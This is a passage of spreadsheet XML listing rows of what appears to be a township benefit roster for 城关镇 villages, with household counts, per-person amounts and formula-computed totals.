        <v>225</v>
      </c>
    </row>
    <row r="405" customHeight="1" spans="1:11">
      <c r="A405" s="23" t="s">
        <v>1194</v>
      </c>
      <c r="B405" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C405" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D405" s="24" t="s">
        <v>1195</v>
      </c>
      <c r="E405" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F405" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G405" s="24">
        <v>1</v>
      </c>
      <c r="H405" s="25">
        <v>365</v>
      </c>
      <c r="I405" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J405" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K405" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="406" customHeight="1" spans="1:11">
      <c r="A406" s="23" t="s">
        <v>1196</v>
      </c>
      <c r="B406" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C406" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D406" s="24" t="s">
        <v>1197</v>
      </c>
      <c r="E406" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F406" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G406" s="24">
        <v>1</v>
      </c>
      <c r="H406" s="25">
        <v>365</v>
      </c>
      <c r="I406" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J406" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K406" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="407" customHeight="1" spans="1:11">
      <c r="A407" s="23" t="s">
        <v>1198</v>
      </c>
      <c r="B407" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C407" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D407" s="24" t="s">
        <v>1199</v>
      </c>
      <c r="E407" s="24" t="s">
        <v>232</v>
      </c>
      <c r="F407" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G407" s="24">
        <v>1</v>
      </c>
      <c r="H407" s="25">
        <v>365</v>
      </c>
      <c r="I407" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J407" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K407" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="408" customHeight="1" spans="1:11">
      <c r="A408" s="23" t="s">
        <v>1200</v>
      </c>
      <c r="B408" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C408" s="24" t="s">
        <v>219</v>
      </c>
      <c r="D408" s="24" t="s">
        <v>1201</v>
      </c>
      <c r="E408" s="24" t="s">
        <v>1202</v>
      </c>
      <c r="F408" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G408" s="24">
        <v>1</v>
      </c>
      <c r="H408" s="25">
        <v>365</v>
      </c>
      <c r="I408" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J408" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K408" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="409" customHeight="1" spans="1:11">
      <c r="A409" s="23" t="s">
        <v>1204</v>
      </c>
      <c r="B409" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C409" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D409" s="24" t="s">
        <v>1205</v>
      </c>
      <c r="E409" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F409" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G409" s="24">
        <v>1</v>
      </c>
      <c r="H409" s="25">
        <v>365</v>
      </c>
      <c r="I409" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J409" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K409" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="410" customHeight="1" spans="1:11">
      <c r="A410" s="23" t="s">
        <v>1206</v>
      </c>
      <c r="B410" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C410" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D410" s="24" t="s">
        <v>1207</v>
      </c>
      <c r="E410" s="24" t="s">
        <v>281</v>
      </c>
      <c r="F410" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G410" s="24">
        <v>1</v>
      </c>
      <c r="H410" s="25">
        <v>365</v>
      </c>
      <c r="I410" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J410" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K410" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="411" customHeight="1" spans="1:11">
      <c r="A411" s="23" t="s">
        <v>1208</v>
      </c>
      <c r="B411" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C411" s="24" t="s">
        <v>1209</v>
      </c>
      <c r="D411" s="24" t="s">
        <v>1210</v>
      </c>
      <c r="E411" s="24" t="s">
        <v>337</v>
      </c>
      <c r="F411" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G411" s="24">
        <v>1</v>
      </c>
      <c r="H411" s="25">
        <v>365</v>
      </c>
      <c r="I411" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J411" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K411" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="412" customHeight="1" spans="1:11">
      <c r="A412" s="23" t="s">
        <v>1211</v>
      </c>
      <c r="B412" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C412" s="24" t="s">
        <v>1212</v>
      </c>
      <c r="D412" s="24" t="s">
        <v>1213</v>
      </c>
      <c r="E412" s="24" t="s">
        <v>1214</v>
      </c>
      <c r="F412" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G412" s="24">
        <v>1</v>
      </c>
      <c r="H412" s="25">
        <v>365</v>
      </c>
      <c r="I412" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J412" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K412" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="413" customHeight="1" spans="1:11">
      <c r="A413" s="23" t="s">
        <v>1215</v>
      </c>
      <c r="B413" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C413" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D413" s="24" t="s">
        <v>1216</v>
      </c>
      <c r="E413" s="24" t="s">
        <v>524</v>
      </c>
      <c r="F413" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G413" s="24">
        <v>1</v>
      </c>
      <c r="H413" s="25">
        <v>365</v>
      </c>
      <c r="I413" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J413" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K413" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="414" customHeight="1" spans="1:11">
      <c r="A414" s="23" t="s">
        <v>1217</v>
      </c>
      <c r="B414" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C414" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D414" s="24" t="s">
        <v>1219</v>
      </c>
      <c r="E414" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F414" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G414" s="24">
        <v>3</v>
      </c>
      <c r="H414" s="25">
        <v>345</v>
      </c>
      <c r="I414" s="24">
        <f t="shared" si="6"/>
        <v>1035</v>
      </c>
      <c r="J414" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K414" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="415" customHeight="1" spans="1:11">
      <c r="A415" s="23" t="s">
        <v>1220</v>
      </c>
      <c r="B415" s="24" t="str">
        <f>B414</f>
        <v>城关镇</v>
      </c>
      <c r="C415" s="24" t="str">
        <f>C414</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D415" s="31" t="s">
        <v>1221</v>
      </c>
      <c r="E415" s="31" t="s">
        <v>1222</v>
      </c>
      <c r="F415" s="24" t="str">
        <f>F414</f>
        <v>4113210108</v>
      </c>
      <c r="G415" s="24"/>
      <c r="H415" s="24"/>
      <c r="I415" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J415" s="24"/>
      <c r="K415" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="416" customHeight="1" spans="1:11">
      <c r="A416" s="23" t="s">
        <v>1223</v>
      </c>
      <c r="B416" s="24" t="str">
        <f>B415</f>
        <v>城关镇</v>
      </c>
      <c r="C416" s="24" t="str">
        <f>C415</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D416" s="30" t="s">
        <v>1224</v>
      </c>
      <c r="E416" s="31" t="s">
        <v>1225</v>
      </c>
      <c r="F416" s="24" t="str">
        <f>F415</f>
        <v>4113210108</v>
      </c>
      <c r="G416" s="24"/>
      <c r="H416" s="24"/>
      <c r="I416" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J416" s="24"/>
      <c r="K416" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="417" customHeight="1" spans="1:12">
      <c r="A417" s="23" t="s">
        <v>1226</v>
      </c>
      <c r="B417" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C417" s="24" t="s">
        <v>1026</v>
      </c>
      <c r="D417" s="24" t="s">
        <v>1227</v>
      </c>
      <c r="E417" s="24" t="s">
        <v>1228</v>
      </c>
      <c r="F417" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G417" s="24">
        <v>1</v>
      </c>
      <c r="H417" s="25">
        <v>365</v>
      </c>
      <c r="I417" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J417" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K417" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="418" customHeight="1" spans="1:12">
      <c r="A418" s="23" t="s">
        <v>1229</v>
      </c>
      <c r="B418" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C418" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D418" s="24" t="s">
        <v>1230</v>
      </c>
      <c r="E418" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F418" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G418" s="24">
        <v>2</v>
      </c>
      <c r="H418" s="25">
        <v>325</v>
      </c>
      <c r="I418" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J418" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K418" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="419" customHeight="1" spans="1:12">
      <c r="A419" s="23" t="s">
        <v>1231</v>
      </c>
      <c r="B419" s="24" t="str">
        <f>B418</f>
        <v>城关镇</v>
      </c>
      <c r="C419" s="24" t="str">
        <f>C418</f>
        <v>西北村</v>
      </c>
      <c r="D419" s="23" t="s">
        <v>1232</v>
      </c>
      <c r="E419" s="23" t="s">
        <v>1233</v>
      </c>
      <c r="F419" s="24" t="str">
        <f>F418</f>
        <v>4113210106</v>
      </c>
      <c r="G419" s="24"/>
      <c r="H419" s="24"/>
      <c r="I419" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J419" s="24"/>
      <c r="K419" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="420" customHeight="1" spans="1:12">
      <c r="A420" s="23" t="s">
        <v>1234</v>
      </c>
      <c r="B420" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C420" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D420" s="24" t="s">
        <v>1235</v>
      </c>
      <c r="E420" s="24" t="s">
        <v>432</v>
      </c>
      <c r="F420" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G420" s="24">
        <v>3</v>
      </c>
      <c r="H420" s="25">
        <v>290</v>
      </c>
      <c r="I420" s="24">
        <f t="shared" si="6"/>
        <v>870</v>
      </c>
      <c r="J420" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K420" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="421" customHeight="1" spans="1:12">
      <c r="A421" s="23" t="s">
        <v>1236</v>
      </c>
      <c r="B421" s="24" t="str">
        <f>B420</f>
        <v>城关镇</v>
      </c>
      <c r="C421" s="24" t="str">
        <f>C420</f>
        <v>中华村</v>
      </c>
      <c r="D421" s="23" t="s">
        <v>1237</v>
      </c>
      <c r="E421" s="23" t="s">
        <v>1238</v>
      </c>
      <c r="F421" s="24" t="str">
        <f>F420</f>
        <v>4113210108</v>
      </c>
      <c r="G421" s="24"/>
      <c r="H421" s="24"/>
      <c r="I421" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J421" s="24"/>
      <c r="K421" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="422" s="2" customFormat="1" ht="21" customHeight="1" spans="1:12">
      <c r="A422" s="23" t="s">
        <v>1239</v>
      </c>
      <c r="B422" s="34" t="s">
        <v>219</v>
      </c>
      <c r="C422" s="27" t="s">
        <v>230</v>
      </c>
      <c r="D422" s="27" t="s">
        <v>1240</v>
      </c>
      <c r="E422" s="27" t="s">
        <v>1241</v>
      </c>
      <c r="F422" s="27" t="s">
        <v>233</v>
      </c>
      <c r="G422" s="27"/>
      <c r="H422" s="27"/>
      <c r="I422" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J422" s="35" t="s">
        <v>1242</v>
      </c>
      <c r="K422" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L422" s="8"/>
    </row>
    <row r="423" customHeight="1" spans="1:12">
      <c r="A423" s="23" t="s">
        <v>1243</v>
      </c>
      <c r="B423" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C423" s="24" t="s">
        <v>219</v>
      </c>
      <c r="D423" s="24" t="s">
        <v>1244</v>
      </c>
      <c r="E423" s="24" t="s">
        <v>902</v>
      </c>
      <c r="F423" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G423" s="24">
        <v>1</v>
      </c>
      <c r="H423" s="25">
        <v>365</v>
      </c>
      <c r="I423" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J423" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K423" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="424" customHeight="1" spans="1:12">
      <c r="A424" s="23" t="s">
        <v>1245</v>
      </c>
      <c r="B424" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C424" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D424" s="24" t="s">
        <v>1247</v>
      </c>
      <c r="E424" s="24" t="s">
        <v>765</v>
      </c>
      <c r="F424" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G424" s="24">
        <v>1</v>
      </c>
      <c r="H424" s="25">
        <v>365</v>
      </c>
      <c r="I424" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J424" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K424" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="425" customHeight="1" spans="1:12">
      <c r="A425" s="23" t="s">
        <v>1248</v>
      </c>
      <c r="B425" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C425" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D425" s="24" t="s">
        <v>1249</v>
      </c>
      <c r="E425" s="24" t="s">
        <v>1250</v>
      </c>
      <c r="F425" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G425" s="24">
        <v>1</v>
      </c>
      <c r="H425" s="25">
        <v>365</v>
      </c>
      <c r="I425" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J425" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K425" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="426" customHeight="1" spans="1:12">
      <c r="A426" s="23" t="s">
        <v>1251</v>
      </c>
      <c r="B426" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C426" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D426" s="24" t="s">
        <v>1252</v>
      </c>
      <c r="E426" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F426" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G426" s="24">
        <v>1</v>
      </c>
      <c r="H426" s="25">
        <v>365</v>
      </c>
      <c r="I426" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J426" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K426" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="427" customHeight="1" spans="1:12">
      <c r="A427" s="23" t="s">
        <v>1253</v>
      </c>
      <c r="B427" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C427" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D427" s="24" t="s">
        <v>1254</v>
      </c>
      <c r="E427" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F427" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G427" s="24">
        <v>1</v>
      </c>
      <c r="H427" s="25">
        <v>365</v>
      </c>
      <c r="I427" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J427" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K427" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="428" customHeight="1" spans="1:12">
      <c r="A428" s="23" t="s">
        <v>1255</v>
      </c>
      <c r="B428" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C428" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D428" s="24" t="s">
        <v>1256</v>
      </c>
      <c r="E428" s="24" t="s">
        <v>1257</v>
      </c>
      <c r="F428" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G428" s="24">
        <v>2</v>
      </c>
      <c r="H428" s="25">
        <v>325</v>
      </c>
      <c r="I428" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J428" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K428" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="429" customHeight="1" spans="1:12">
      <c r="A429" s="23" t="s">
        <v>1258</v>
      </c>
      <c r="B429" s="24" t="str">
        <f>B428</f>
        <v>城关镇</v>
      </c>
      <c r="C429" s="24" t="str">
        <f>C428</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D429" s="23" t="s">
        <v>1259</v>
      </c>
      <c r="E429" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F429" s="24" t="str">
        <f>F428</f>
        <v>4113210103</v>
      </c>
      <c r="G429" s="24"/>
      <c r="H429" s="24"/>
      <c r="I429" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J429" s="24"/>
      <c r="K429" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="430" customHeight="1" spans="1:12">
      <c r="A430" s="23" t="s">
        <v>1260</v>
      </c>
      <c r="B430" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C430" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D430" s="24" t="s">
        <v>1261</v>
      </c>
      <c r="E430" s="24" t="s">
        <v>479</v>
      </c>
      <c r="F430" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G430" s="24">
        <v>1</v>
      </c>
      <c r="H430" s="25">
        <v>365</v>
      </c>
      <c r="I430" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J430" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K430" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="431" customHeight="1" spans="1:12">
      <c r="A431" s="23" t="s">
        <v>1262</v>
      </c>
      <c r="B431" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C431" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D431" s="24" t="s">
        <v>1263</v>
      </c>
      <c r="E431" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F431" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G431" s="24">
        <v>1</v>
      </c>
      <c r="H431" s="25">
        <v>365</v>
      </c>
      <c r="I431" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J431" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K431" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="432" customHeight="1" spans="1:12">
      <c r="A432" s="23" t="s">
        <v>1264</v>
      </c>
      <c r="B432" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C432" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D432" s="24" t="s">
        <v>1266</v>
      </c>
      <c r="E432" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F432" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G432" s="24">
        <v>1</v>
      </c>
      <c r="H432" s="25">
        <v>365</v>
      </c>
      <c r="I432" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J432" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K432" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="433" customHeight="1" spans="1:11">
      <c r="A433" s="23" t="s">
        <v>1267</v>
      </c>
      <c r="B433" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C433" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D433" s="24" t="s">
        <v>1268</v>
      </c>
      <c r="E433" s="24" t="s">
        <v>1269</v>
      </c>
      <c r="F433" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G433" s="24">
        <v>1</v>
      </c>
      <c r="H433" s="25">
        <v>365</v>
      </c>
      <c r="I433" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J433" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K433" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="434" customHeight="1" spans="1:11">
      <c r="A434" s="23" t="s">
        <v>1270</v>
      </c>
      <c r="B434" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C434" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D434" s="24" t="s">
        <v>1271</v>
      </c>
      <c r="E434" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F434" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G434" s="24">
        <v>1</v>
      </c>
      <c r="H434" s="25">
        <v>365</v>
      </c>
      <c r="I434" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J434" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K434" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="435" customHeight="1" spans="1:11">
      <c r="A435" s="23" t="s">
        <v>1272</v>
      </c>
      <c r="B435" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C435" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D435" s="24" t="s">
        <v>1273</v>
      </c>
      <c r="E435" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F435" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G435" s="24">
        <v>1</v>
      </c>
      <c r="H435" s="25">
        <v>365</v>
      </c>
      <c r="I435" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J435" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K435" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="436" customHeight="1" spans="1:11">
      <c r="A436" s="23" t="s">
        <v>1274</v>
      </c>
      <c r="B436" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C436" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D436" s="24" t="s">
        <v>1275</v>
      </c>
      <c r="E436" s="24" t="s">
        <v>1276</v>
      </c>
      <c r="F436" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G436" s="24">
        <v>1</v>
      </c>
      <c r="H436" s="25">
        <v>365</v>
      </c>
      <c r="I436" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J436" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K436" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="437" customHeight="1" spans="1:11">
      <c r="A437" s="23" t="s">
        <v>1277</v>
      </c>
      <c r="B437" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C437" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D437" s="24" t="s">
        <v>1278</v>
      </c>
      <c r="E437" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F437" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G437" s="24">
        <v>1</v>
      </c>
      <c r="H437" s="25">
        <v>365</v>
      </c>
      <c r="I437" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J437" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K437" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="438" customHeight="1" spans="1:11">
      <c r="A438" s="23" t="s">
        <v>1279</v>
      </c>
      <c r="B438" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C438" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D438" s="24" t="s">
        <v>1280</v>
      </c>
      <c r="E438" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F438" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G438" s="24">
        <v>1</v>
      </c>
      <c r="H438" s="25">
        <v>365</v>
      </c>
      <c r="I438" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J438" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K438" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="439" customHeight="1" spans="1:11">
      <c r="A439" s="23" t="s">
        <v>1281</v>
      </c>
      <c r="B439" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C439" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D439" s="24" t="s">
        <v>1282</v>
      </c>
      <c r="E439" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F439" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G439" s="24">
        <v>1</v>
      </c>
      <c r="H439" s="25">
        <v>365</v>
      </c>
      <c r="I439" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J439" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K439" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="440" customHeight="1" spans="1:11">
      <c r="A440" s="23" t="s">
        <v>1283</v>
      </c>
      <c r="B440" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C440" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D440" s="24" t="s">
        <v>1284</v>
      </c>
      <c r="E440" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F440" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G440" s="24">
        <v>1</v>
      </c>
      <c r="H440" s="25">
        <v>365</v>
      </c>
      <c r="I440" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J440" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K440" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="441" customHeight="1" spans="1:11">
      <c r="A441" s="23" t="s">
        <v>1285</v>
      </c>
      <c r="B441" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C441" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D441" s="24" t="s">
        <v>1286</v>
      </c>
      <c r="E441" s="24" t="s">
        <v>543</v>
      </c>
      <c r="F441" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G441" s="24">
        <v>2</v>
      </c>
      <c r="H441" s="25">
        <v>325</v>
      </c>
      <c r="I441" s="24">
        <f t="shared" si="6"/>
        <v>650</v>
      </c>
      <c r="J441" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K441" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="442" customHeight="1" spans="1:11">
      <c r="A442" s="23" t="s">
        <v>1287</v>
      </c>
      <c r="B442" s="24" t="str">
        <f>B441</f>
        <v>城关镇</v>
      </c>
      <c r="C442" s="24" t="str">
        <f>C441</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D442" s="23" t="s">
        <v>1288</v>
      </c>
      <c r="E442" s="23" t="s">
        <v>1289</v>
      </c>
      <c r="F442" s="24" t="str">
        <f>F441</f>
        <v>4113210108</v>
      </c>
      <c r="G442" s="24"/>
      <c r="H442" s="24"/>
      <c r="I442" s="24">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="J442" s="24"/>
      <c r="K442" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="443" customHeight="1" spans="1:11">
      <c r="A443" s="23" t="s">
        <v>1290</v>
      </c>
      <c r="B443" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C443" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D443" s="24" t="s">
        <v>1291</v>
      </c>
      <c r="E443" s="24" t="s">
        <v>340</v>
      </c>
      <c r="F443" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G443" s="24">
        <v>1</v>
      </c>
      <c r="H443" s="25">
        <v>365</v>
      </c>
      <c r="I443" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J443" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K443" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="444" customHeight="1" spans="1:11">
      <c r="A444" s="23" t="s">
        <v>1292</v>
      </c>
      <c r="B444" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C444" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D444" s="24" t="s">
        <v>1293</v>
      </c>
      <c r="E444" s="24" t="s">
        <v>1294</v>
      </c>
      <c r="F444" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G444" s="24">
        <v>1</v>
      </c>
      <c r="H444" s="25">
        <v>365</v>
      </c>
      <c r="I444" s="24">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J444" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K444" s="24" t="s">
        <v>225</v>
      </c>
    </row>
